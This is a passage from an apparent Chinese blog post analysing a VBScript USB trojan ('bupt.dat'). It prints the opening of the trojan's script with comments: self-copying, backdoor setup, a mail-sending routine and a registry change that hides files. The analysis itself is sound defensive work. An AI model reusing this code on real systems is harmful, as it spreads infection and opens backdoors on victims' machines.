北邮男生木马”代码全注释 -.docVIP

北邮男生木马”代码全注释 - “北邮男生木马”代码全注释 - sjdev的专栏(申俊杰) - CSDN博客您还未登录！|登录|注册|帮助CSDN 上周的某一天，我同事忽然发现自己电脑不太对劲，经查看原来是中了木马。比较有意思的是，可以通过一个bupt.dat的文件来查看该木马的某些实现细节。由于bupt是北邮的简称，所以我有充分的理由相信该木马是北邮某个学生搞的。“北邮男生”是我们给这个木马起的名字，至于为什么叫“男生”而不是“女生”或者其它代号，可以通过下面的代码自己寻找答案。Ps:请不要试图查找有关“北邮男生”木马的信息，也许它会被冠以其他名字。Psps：截止到2009/10/19，通过关键字“bupt.dat”百度无法搜索到任何相关信息， 我在CSDN上发表了这个文章的一个简短版本，部分网友表示“这个木马太简单”。我想说的是：1.论坛上发表的只是整个脚本的一部分，因为输入有限制。2.这个木马还包含其他文件。因为很明显，脚本是不可能自动执行的。这些其他的文件包括：一个autorun.inf、一个scs、一个svchost(其实这个是WScript.exe，请详看代码注释说明)、还包括tlntsvr服务。 另外：我重新使用bupt.dat关键字搜索了一下，大家可以分析一下google的结果。 主代码部分 view plaincopy to clipboardprint? 1.主体函数部分 当运行脚本时，主体函数部分代码依次执行 所以分析脚本“主体函数部分”可以看出脚本程序执行思路 On Error Resume Next 创建文件系统对象，用于文件操作 Set fso = CreateObject(Scripting.FileSystemObject) 创建Shell对象 Set WshShell = CreateObject(WScript.Shell) 创建NetWork对象 Set WshNetWork = WScript.CreateObject(Wscript.NetWork) 脚本的全路径名，如J:\Butp.dat ThisPath = WScript.ScriptFullName 1 for system folder.通常返回值是C:\Windows\System32 SysDir = fso.GetSpecialFolder(1) \ 从SysDir从截取Windows目录，如C:\Windows\System32截取后为C:\Windows\ WinDir = Left(SysDir, 11) SvcHost = svchost.exe FnSys = svchost.dat FnSysExe = scs.exe FnMail = liam.dat FnuTray = bupt.dat FnuTrayExe = scs Copy脚本的副本 Set file = fso.OpenTextFile(ThisPath, 1) 1 for readonly VBScriptCopy = file.ReadAll file.Close Set file = Nothing IF LCase(SysDir) = LCase(Left(ThisPath, Len(SysDir))) Then 如果脚本文件位于系统目录(system32)下 Call SendMail Call SetupBD Call ListEnuTray Else 不显示隐藏文件 WshShell.RegWrite HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\showsuper